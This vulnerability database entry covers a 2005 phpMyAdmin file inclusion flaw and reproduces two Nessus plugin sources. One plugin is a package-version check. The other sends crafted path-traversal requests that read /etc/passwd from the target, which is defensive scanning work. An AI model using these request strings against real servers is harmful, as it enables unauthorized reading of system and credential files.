Vulnerabilities > CVE-2005-0567 - Unspecified vulnerability in PHPmyadmin 2.6.1

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
phpmyadmin
nessus

Summary

Multiple PHP remote file inclusion vulnerabilities in phpMyAdmin 2.6.1 allow remote attackers to execute arbitrary PHP code by modifying the (1) theme parameter to phpmyadmin.css.php or (2) cfg[Server][extension] parameter to database_interface.lib.php to reference a URL on a remote web server that contains the code.

Vulnerable Configurations

Part Description Count
Application
Phpmyadmin
1

Nessus

  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_882EF43B901F11D9A22C0001020EED82.NASL
    descriptionA phpMyAdmin security announcement reports : We received two bug reports by Maksymilian Arciemowicz about those vulnerabilities and we wish to thank him for his work. The vulnerabilities apply to those points : - css/phpmyadmin.css.php was vulnerable against $cfg and GLOBALS variable injections. This way, a possible attacker could manipulate any configuration parameter. Using phpMyAdmin
    last seen2020-06-01
    modified2020-06-02
    plugin id19016
    published2005-07-13
    reporterThis script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/19016
    titleFreeBSD : phpmyadmin -- arbitrary file include and XSS vulnerabilities (882ef43b-901f-11d9-a22c-0001020eed82)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(19016);
      script_version("1.20");
      script_cvs_date("Date: 2019/08/02 13:32:37");
    
      script_cve_id("CVE-2005-0543", "CVE-2005-0567");
      script_bugtraq_id(12644, 12645);
    
      script_name(english:"FreeBSD : phpmyadmin -- arbitrary file include and XSS vulnerabilities (882ef43b-901f-11d9-a22c-0001020eed82)");
      script_summary(english:"Checks for updated packages in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote FreeBSD host is missing one or more security-related
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "A phpMyAdmin security announcement reports :
    
    We received two bug reports by Maksymilian Arciemowicz about those
    vulnerabilities and we wish to thank him for his work. The
    vulnerabilities apply to those points :
    
    - css/phpmyadmin.css.php was vulnerable against $cfg and GLOBALS
    variable injections. This way, a possible attacker could manipulate
    any configuration parameter. Using phpMyAdmin's theming mechanism, he
    was able to include arbitrary files. This is especially dangerous if
    php is not running in safe mode.
    
    - A possible attacker could manipulate phpMyAdmin's localized strings
    via the URL and inject harmful JavaScript code this way, which could
    be used for XSS attacks."
      );
      # http://marc.theaimsgroup.com/?l=bugtraq&m=110929725801154
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=bugtraq&m=110929725801154"
      );
      # http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.phpmyadmin.net/security/PMASA-2005-1/"
      );
      # https://vuxml.freebsd.org/freebsd/882ef43b-901f-11d9-a22c-0001020eed82.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?67495e86"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpMyAdmin");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpmyadmin");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/21");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/03/08");
      script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/13");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"phpmyadmin>1.3.1<2.6.1.2")) flag++;
    if (pkg_test(save_report:TRUE, pkg:"phpMyAdmin>1.3.1<2.6.1.2")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyCGI abuses
    NASL idPHPMYADMIN_REMOTE_FILE_INCLUDES.NASL
    descriptionThe installed version of phpMyAdmin suffers from multiple local file include flaws due to its failure to sanitize user input prior to its use in PHP
    last seen2020-06-01
    modified2020-06-02
    plugin id17221
    published2005-02-25
    reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/17221
    titlephpMyAdmin < 2.6.1 pl1 Multiple Script File Inclusions
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(17221);
      script_version("1.21");
      script_cvs_date("Date: 2018/11/15 20:50:18");
    
      script_cve_id("CVE-2005-0567");
      script_bugtraq_id(12645);
    
      script_name(english:"phpMyAdmin < 2.6.1 pl1 Multiple Script File Inclusions");
      script_summary(english:"Detect multiple local file include vulnerabilities in phpMyAdmin");
     
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP application that is prone to
    multiple local file include issues." );
      script_set_attribute(attribute:"description", value:
    "The installed version of phpMyAdmin suffers from multiple local file
    include flaws due to its failure to sanitize user input prior to its use
    in PHP 'include' and 'require_once' calls.  Specifically, a remote
    attacker can control values for the 'GLOBALS[cfg][ThemePath]' parameter
    used in 'css/phpmyadmin.css.php' as well as the 'cfg[Server][extension]'
    parameter use in 'libraries/database_interface.lib.php', which enables
    him to read arbitrary files on the remote host and possibly even run
    arbitrary code, subject to the privileges of the web server process." );
      script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110929725801154&w=2" );
      script_set_attribute(attribute:"see_also", value:"http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-1" );
      script_set_attribute(attribute:"solution", value:
    "Upgrade to phpMyAdmin 2.6.1 pl1 or later." );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
      script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/25");
      script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/24");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
      script_end_attributes();
     
      script_category(ACT_ATTACK);
      script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"CGI abuses");
    
      script_dependencies("phpMyAdmin_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/phpMyAdmin", "www/PHP");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("data_protection.inc");
    
    port = get_http_port(default:80, php:TRUE);
    
    
    # Try to grab /etc/passwd.
    exploits = make_list(
      "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00",
      "/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00"
      # nb: skip this since it's a bit harder to grab /etc/passwd
      # "/libraries/database_interface.lib.php?cfg[Server][extension]=/etc/passwd"
    );
    
    
    # Test an install.
    install = get_kb_item(string("www/", port, "/phpMyAdmin"));
    if (isnull(install)) exit(0);
    matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
    if (!isnull(matches))
    {
      dir = matches[2];
    
      # Try to grab /etc/passwd.
      foreach exploit (exploits)
      {
        r = http_send_recv3(method:"GET",item:string(dir, exploit), port:port, exit_on_fail:TRUE);
        res = r[2];
    
        # It's a problem if there's an entry for root.
        if (egrep(pattern:"root:.*:0:[01]:", string:res))
        {
          if (report_verbosity)
          {
            res = data_protection::redact_etc_passwd(output:res);
            report = string(
              "\n",
              "Here are the contents of the file '/etc/passwd' that Nessus\n",
              "was able to read from the remote host :\n",
              "\n",
              res
            );
            security_warning(port:port, extra:report);
          }
          else security_warning(port);
          exit(0);
        }
    
        # We're finished unless the "Perform thorough tests" setting is enabled.
        if (!thorough_tests) break;
      }
    }